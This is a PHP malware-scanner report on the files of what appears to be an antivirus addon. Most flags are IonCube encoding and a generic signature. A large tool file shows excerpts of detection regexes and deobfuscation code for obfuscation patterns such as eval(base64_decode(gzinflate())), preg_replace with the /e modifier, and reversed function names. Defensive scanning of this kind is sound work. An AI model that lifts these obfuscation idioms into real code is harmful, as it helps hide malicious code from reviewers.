//usr/local/mgr5/addon/revisium_antivirus/services/migrations.php Size: 7.52 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder (a module/library for protected functions) that is often used to obfuscate malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/services/scheduler.php Size: 4.88 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder (a module/library for protected functions) that is often used to obfuscate malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/services/cleaner.php Size: 2.84 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder (a module/library for protected functions) that is often used to obfuscate malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/services/email.php Size: 3.95 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder (a module/library for protected functions) that is often used to obfuscate malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/services/task_executor.php Size: 3.21 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/lib/NotificationBuilder.php Size: 9.63 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/lib/EmailChecker.php Size: 6.52 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/lib/FoldersInfo.php Size: 2.57 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/lib/SMTPEmailParams.php Size: 4.09 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/lib/Form.php Size: 10.92 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/lib/Client.php Size: 7.12 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/lib/ISP.php Size: 3.36 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/lib/EmailNotifBanner.php Size: 3.30 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/lib/API.php Size: 5.12 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/lib/View/ViewClientList.php Size: 5.99 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/lib/View/ViewFolder.php Size: 2.32 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/lib/View/ViewFolderList.php Size: 14.91 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/lib/View/View.php Size: 2.79 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/lib/View/ViewList.php Size: 7.80 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/lib/View/ViewDomainList.php Size: 8.61 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/lib/View/ViewFolderDetails.php Size: 23.21 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/lib/ScannableFolder.php Size: 2.33 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/lib/Errors.php Size: 2.08 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/lib/Locale.php Size: 7.56 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/lib/StatsManager.php Size: 10.99 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/lib/Settings.php Size: 11.59 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/lib/EmailFactory.php Size: 3.14 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/lib/Template.php Size: 8.06 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/lib/Domain.php Size: 5.90 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/lib/PermanentBanners.php Size: 6.39 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/lib/User.php Size: 3.12 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/lib/CurrentBanners.php Size: 2.95 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/lib/XMLChanger.php Size: 5.99 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/lib/EULA.php Size: 2.78 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/lib/Locales/en-EN.php Size: 9.97 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/lib/Locales/ru-RU.php Size: 12.19 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/lib/Application.php Size: 30.40 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 3
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
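| Function strrev exec_strrev Line: 85 Dangerous Encoded Function `exec` (the name written in reverse); the match below is a four-character mixed-case string in a file also reported as IonCube-encoded, so it may be a chance hit inside encoded data rather than a reversed call [https://www.php.net/exec] |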
CeXE
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/lib/KeyValueStorage.php Size: 2.00 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/lib/InfectedBanner.php Size: 5.55 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 3
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
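| Sign 7830f7a6 Line: 48 Dangerous Malware Signature (hash: 7830f7a6); the match below is a four-character string in a file also reported as IonCube-encoded, and the same signature matches `n0cl` in procu2.php later in this report, so the rule appears to be a short case-insensitive pattern that can hit encoded data by chance |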
n0cL
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/lib/Log.php Size: 1.98 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/lib/Server.php Size: 2.71 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/lib/Banner.php Size: 6.05 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/lib/ScaforeTaskHelper.php Size: 15.25 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/scripts/mover.php Size: 7.39 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/tools/procu2.php Size: 1.39 MB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Warns: 8 Dangers: 22
| Description | Match |
|---|
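Exploit base64_long Line: 1 Warning Long Base64-encoded text is usually used for the obfuscation of malicious code; here the visible start of the match decodes to a PHP-serialized array keyed by file names (`wizard.php`, `update_client.php`), i.e. structured data rather than executable code |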
'YTo1OntzOjEwOiJ3aXphcmQucGhwIjtzOjM3OiJjbGFzcyBXZWxjb21lU3RlcCBleHRlbmRzIENXaXphcmRTdGVwIjtzOjE3OiJ1cGRhdGVfY2xpZW50LnBocCI7czozNzoieyBDVXBkYXRlQ2xpZW50OjpBZGRNZXNzYWdlMkxvZygiZXhlYyI7czoxMToiaW5jbHVkZS5waHAiO3M6NDg6IkdMT0JBTFNbIlVTRVIiXS0+SXNBdXRob3JpemVkKCkgJiYgJGFyQXV0aFJlc3VsdCI7czo5OiJzdGFydC5waHAiO3M6NjA6IkJYX1JPT1QuJy9tb2R1bGVzL21haW4vY2xhc3Nlcy9nZW5lcmFsL3VwZGF0ZV9kYl91cGRhdGVyLnBocCI7czoxMDoiaGVscGVyLnBocCI7czo1ODoiSlBsdWdpbkhlbHBlcjo6Z2V0UGx1Z2luKCJzeXN0ZW0iLCJvbmVjbGlja2NoZWNrb3V0X3Z...
| Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
"YToxNTY1OntzOjM6IuKAqCI7czoxOiIgIjtzOjM6IuKAqSI7czoxOiIgIjtzOjM6IuGagCI7czoxOiIgIjtzOjM6IuKAgCI7czoxOiIgIjtzOjM6IuKAgSI7czoxOiIgIjtzOjM6IuKAgiI7czoxOiIgIjtzOjM6IuKAgyI7czoxOiIgIjtzOjM6IuKAhCI7czoxOiIgIjtzOjM6IuKAhSI7czoxOiIgIjtzOjM6IuKAhiI7czoxOiIgIjtzOjM6IuKAiCI7czoxOiIgIjtzOjM6IuKAiSI7czoxOiIgIjtzOjM6IuKAiiI7czoxOiIgIjtzOjM6IuKBnyI7czoxOiIgIjtzOjI6IsKgIjtzOjE6IiAiO3M6Mzoi4oCHIjtzOjE6IiAiO3M6Mzoi4oCvIjtzOjE6IiAiO3M6Mjoiw4IiO3M6MToiICI7czoyOiLfuiI7czoxOiJfIjtzOjM6Iu+5jSI7czoxOiJfIjtzOjM6Iu+5jiI...
| Exploit concat_vars_array Line: 1 Warning Concatenation of arrays technique is usually used for the obfuscation of malicious code |
$JYekrRTYM[2] . $JYekrRTYM[14] . $JYekrRTYM[13] . $JYekrRTYM[21] . $JYekrRTYM[4] . $JYekrRTYM[17] . $JYekrRTYM[19] . $JYekrRTYM[26] . $JYekrRTYM[20] . $JYekrRTYM[20] . $JYekrRTYM[3] . $JYekrRTYM[4] . $JYekrRTYM[2] . $JYekrRTYM[14] . $JYekrRTYM[3] . $JYekrRTYM[4]; return Helpers::convertToSafeFunc($jPnPLPZcMHgH) ? $jPnPLPZcMHgH($sBtUiFZaz) : ''; }
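| Exploit eval_base64 Line: 1 Dangerous RCE (Remote Code Execution) through Base64 text, which allows remote attackers to execute arbitrary commands or code on the target machine; the match below sits inside a quoted string that is being concatenated (note the escaped quotes), so it appears to be text the file builds or compares against rather than a direct `eval` call |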
eval(base64_decode(gzinflate(base64_decode(\'' . $i0l1i10000011111100[6] . '\')
| Exploit eval_preg Line: 1 Dangerous RCE (Remote Code Execution) through PCRE (Perl Compatible Regular Expressions), i.e. the `/e` modifier of `preg_replace` (removed in PHP 7.0), which allows remote attackers to execute arbitrary commands or code on the target machine |
preg_replace("/' . $i0l1i10000011111100[2] . '/e",\'\'', '\'\',"' . $i0l1i10000011111100[2] . '")
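| Exploit execution Line: 1 Dangerous RCE (Remote Code Execution) allows remote attackers to execute PHP code on the target machine via HTTP; the match below decodes the contents of a file (`$avdb_file`) and shows no HTTP input, so the risk depends on who can write that file [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |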
base64_decode(str_rot13(strrev(trim(file_get_contents($avdb_file)
| Exploit hex_char Line: 1 Dangerous Hex char is usually used for the obfuscation of malicious code |
\x5f
| Exploit ioncube_loader Line: 1 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
IonCube_loader
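| Exploit md5_create_function Dangerous The `create_function` technique is usually used for the obfuscation of malicious code; the matched excerpt below runs `preg_match` against eval patterns and is followed by a method whose name starts with `deobfus`, which suggests code that detects and decodes this technique rather than code that uses it |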
$md5 = md5($res); $res = base64_decode(str_replace($md5, '', strtr($i0l1i10000011111100[5], $i0l1i10000011111100[6], $i0l1i10000011111100[7]))); if (preg_match('~eval\((?:\$[^(]{0,50}\(){2}\$[^,]{0,50},\s{0,10}\'([^\']{1,500})\',\s{0,10}\'([^\']{1,500})\'\){3};~msi', $res, $match)) { $res = Helpers::replaceVarsFromArray($vars, $res); if (preg_match('~eval\(base64_decode\(strtr\(~msi', $res)) { $res = base64_decode(strtr($arr1, $match[1], $match[2])); } } } return $res; } private function deobfus...
| Exploit nano Line: 1 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$m[1]($m[2])
| Exploit reversed Line: 1 Dangerous Reverse function technique is used for the obfuscation of dangerous PHP functions |
ecalper_rts
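| Exploit silenced_eval Line: 1 Dangerous RCE (Remote Code Execution) allows remote attackers to execute PHP code on the target machine; the match below is a regular-expression fragment (character classes and a non-capturing group), not a call to `eval` |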
@eval((?:\(\$[0O]+\[[\'"]\w+[\'"]\])
| Function assert Warning Potentially dangerous function `assert` [https://www.php.net/assert] |
assert(', 'eval(', $string); $string = str_replace('@@slaquote@@', '\\\'', $string); $string = str_replace('@@sladquote@@', '\\"', $string); $string = str_replace("eval(''.", 'eval(', $string); $res = str_replace($find, $string, $str); if (strpos($string, 'gzinflate(\'') !== false) { $res = $this->deobfuscateEval(stripcslashes($res), []); } return $res; } private function deobfuscateEval($str, $i0l1i10000011111100) { if (preg_match('~\)+\..{0,30}base64_decode~msi', $str)) { $res = explode(').', ...
| Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function(\'', $cr_func, 2)); $func = implode(') {', explode('\',\'', $func, 2)); $func = substr($func, 0, -2) . '}'; $str = str_replace($cr_func, $func, $str); } return $str; } public static function calc($expr) { if (is_array($expr)) { $expr = $expr[0]; } $expr = str_replace([' ', "\r", "\n", "\t"], '', $expr); preg_match('~(chr|min|max|round)?\(([^\)]+)\)~msi', $expr, $expr_arr); if (@$expr_arr[1] == "m\x69\x6e" || @$expr_arr[1] == "m\x61\x78") { return $expr_arr[1](explode(',', $expr_a...
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval(?&c)\()?(?&c)rawurldecode(?&c)\((?&c)\3(?&c)\)(?&c)\s*\^\s*substr(?&c)\((?&c)str_repeat(?&c)\((?&c)\2,\s*(?&c)\((?&c)strlen(?&c)\((?&c)\3(?&c)\)(?&c)/strlen(?&c)\((?&c)\2(?&c)\)(?&c)\)(?&c)\s*\+\s*1(?&c)\)(?&c),\s*0,(?&c)\s*strlen(?&c)\((?&c)\3(?&c)\)(?&c)\)(?&c)\)(?:(?&c)\s*\.\s*\'{\'(?&c)\))?(?&c);~msi', "i\x64" => "x\x6f\x72F\x4e\x61m\x65", ], [ "f\x75\x6cl" => '~(\$\w{1,40})=base64_decode\(\'[^\']+\'\);(\$\w+)=base64_decode\(\'[^\']+\'\);(\$\w+)=base64_decode\(\'([^\']+)\'\);eval\(\1\(g...
| Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec($i0l1i10000011010100, $i0l1i10000000100000, $return_var); $i0l1i10000000100000 = implode("\n", $i0l1i10000000100000); if (preg_match_all('~\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}~', $i0l1i10000000100000, $i0l1i10000011111100, PREG_PATTERN_ORDER)) { foreach ($i0l1i10000011111100[0] as $m) { $i0l1i10000000101010[] = $m; } } } return array_values(array_diff($i0l1i10000000101010, $i0l1i10000011011110)); } function check_elf($i0l1i10000010000100) { $firstFourBytes = ''; if ($fd = @fopen($i0l1i1000001...
| Function posix_setuid Warning Potentially dangerous function `posix_setuid` [https://www.php.net/posix_setuid] |
posix_setuid($info["u\x69\x64"]); echo('Running from ' . $info["u\x69\x64"] . ':' . $info["g\x69\x64"] . "\n"); } else { echo("Invalid username\n"); exit(-1); } } if (isset($i0l1i10000011000000s["e\x78\x74e\x6e\x64e\x64\x5fr\x65\x70o\x72\x74"]) || isset($i0l1i10000011000000s["e"])) { $extended_report = true; } if (isset($i0l1i10000011000000s['black-list'])) { $blacked_by_cloud_list_file = $i0l1i10000011000000s['black-list']; } if (isset($i0l1i10000011000000s["s\x69\x67n\x61\x74u\x72\x65"])) { $s...
| Function str_rot13 eval_str_rot13 Line: 1 Dangerous Encoded Function `eval` [https://www.php.net/eval] |
riny
| Function str_rot13 exec_str_rot13 Line: 1 Dangerous Encoded Function `exec` [https://www.php.net/exec] |
RKRp
| Function strrev eval_strrev Line: 1 Dangerous Encoded Function `eval` [https://www.php.net/eval] |
lave
